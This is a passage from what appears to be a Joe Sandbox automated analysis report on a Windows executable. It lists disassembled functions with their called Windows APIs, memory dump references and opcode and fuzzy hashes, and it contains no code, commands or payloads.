                                                                                                                                                                                                                                                        • Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                                                                                                        • Instruction ID: 04c9e557af23570318a8f5ebce692d435db2192368ad71c63ee7173dcccb5e32
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51117F3291CA8382F6188F10A54157962E4FF41380F643534E79DC779BEF6DE900C784
                                                                                                                                                                                                                                                        Function 00007FF6063A376C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: GetDlgItem.USER32 ref: 00007FF6063A2C33
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: ShowWindow.USER32 ref: 00007FF6063A2C59
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2C6E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2C86
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2CA7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2CC3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D06
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D24
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D38
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D62
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063A2BF4: SendMessageW.USER32 ref: 00007FF6063A2D7A
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6063A3807
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1587882848-0
                                                                                                                                                                                                                                                        • Opcode ID: 77ef27b56bb4c41a1db006d89dbb7bf76ea420d19d4cfb9dd224e5a037684bb3
                                                                                                                                                                                                                                                        • Instruction ID: d6c56f9b5420ae736808867976b1f64802c13b49a84245797c9fcc19a781beae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77ef27b56bb4c41a1db006d89dbb7bf76ea420d19d4cfb9dd224e5a037684bb3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A01DBB2B1868542FD189724D04636E6351FF897A0F602735F69DCABD6DE2DE140D740
                                                                                                                                                                                                                                                        Function 00007FF606386288 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: FindFirstFileW.KERNELBASE ref: 00007FF6063864CB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: FindFirstFileW.KERNELBASE ref: 00007FF60638651E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60638647C: GetLastError.KERNEL32 ref: 00007FF60638656F
                                                                                                                                                                                                                                                        • FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1464966427-0
                                                                                                                                                                                                                                                        • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                                                                                                        • Instruction ID: eed9494a634bb71d59d075f6a89212e220d6f4c09fc9b7a65fe5c6392e86e170
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0AF629083818DEA589B7591052BC37609F1ABB4F242374DA7D872EBCE6ED484C784
                                                                                                                                                                                                                                                        Function 00007FF6063900F0 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemMessageSend
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3015471070-0
                                                                                                                                                                                                                                                        • Opcode ID: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                                                                                                        • Instruction ID: 93ddb6ef3585b449780e531c1276977f6ae171458f3b45b24fc8b783de303a9d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49D05E90F1834682FB28A311A4193391311AF91B88F302235D98EDA7D5DE6FE6164BD4
                                                                                                                                                                                                                                                        Function 00007FF606384E00 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 749574446-0
                                                                                                                                                                                                                                                        • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                                                                                                        • Instruction ID: 399b3358ce337b22c6642c6d21b7fbc725be3b9aaf4aa36067e0bda30cb69a41
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7B09210B06941C2D6086B22DC821285324AB88B01BA86420C60ED1220CF1DC8EB9700
                                                                                                                                                                                                                                                        Function 00007FF6063B2E94 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                                                                                                        • Instruction ID: b6c11834507195f55dc74ff4169131fa241f9bd7f058d0e69d6b50bf46a92fd4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F09014B09A0382FE5D5B7799453BB52805F88B80F6C3534CF0EC67D2EF2EE68142A4
                                                                                                                                                                                                                                                        Function 00007FF6063B0E5C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                                                                                                        • Instruction ID: e5b004fe49ca3b66ae8dbdb4f4b4d5cc02ac04735eca15764ae63c3214d5cc92
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F08C00B19F4385FE5C97B2584127A62804F887A0F287634DEAED62C2DF2EE48181A4
                                                                                                                                                                                                                                                        Function 00007FF6063842D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                                                                                                        • Instruction ID: 296af64e42b6e696f0d0e08a6d24f3f21c8272c38d7071ba853e117f42ce0d88
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AF08122A0874399FB288B30E4403B966A0DB04F79F696334D779C15E5DFA9DDA58380

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00007FF60638E91C Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                                                                                                                                                        • API String ID: 2539828978-2259941744
                                                                                                                                                                                                                                                        • Opcode ID: 1f2844f007cb53a30dd4d30b0c80e663d4b15e2704c23efd67c5de4fa8a4db10
                                                                                                                                                                                                                                                        • Instruction ID: 210304b7c10141a8e3b2973216f0b82cafe161ce97713d3f68ddee4b616c9682
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f2844f007cb53a30dd4d30b0c80e663d4b15e2704c23efd67c5de4fa8a4db10
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DB2C562E1878245EA189B25D4541FAA361EFC57D0F20633AE69DC37F6EE6EE140C780
                                                                                                                                                                                                                                                        Function 00007FF6063B59E0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 1759834784-2761157908
                                                                                                                                                                                                                                                        • Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                                                                                                        • Instruction ID: 03acbadc23a0c3add96f0f577490640695934557ead5275790d829ad6b633222
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CB2E972E089828BE76D8E25D4416FD37A1FB85388F647135DB0AD7B85DF3AE5048B80
                                                                                                                                                                                                                                                        Function 00007FF6063872AC Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1693479884-0
                                                                                                                                                                                                                                                        • Opcode ID: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                                                                                                                                                                                                                                        • Instruction ID: 866cc81844a7db773cb5fab5b43d92f494c5903496c98716a69a14c8363577f1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72A1D462F14B5289FF088B7988445BC2372AB44BE4B746235DE2D97BD9DFBDE4418280
                                                                                                                                                                                                                                                        Function 00007FF6063A6940 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                        • Instruction ID: e833c88a59e9e2d895e4ad266990f03a677baed5d67a58cb52db2ee3aa4987b2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D315C72608B818AEB648F60E8503ED7364FB85748F54503ADB8E87B99DF3DD648C750
                                                                                                                                                                                                                                                        Function 00007FF6063AAC68 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                        • Instruction ID: 8a8b1e28f768546c5ed8e54fb30ba4b9181de1733354cc2e06be233c9eb2b8c6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C319136608F8186DB64CF25E8402AE73A0FB88758F601135EA8D87B69DF3DC545CB40
                                                                                                                                                                                                                                                        Function 00007FF6063B2F24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6063B2F54
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063AAEC4: GetCurrentProcess.KERNEL32(00007FF6063B415D), ref: 00007FF6063AAEF1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
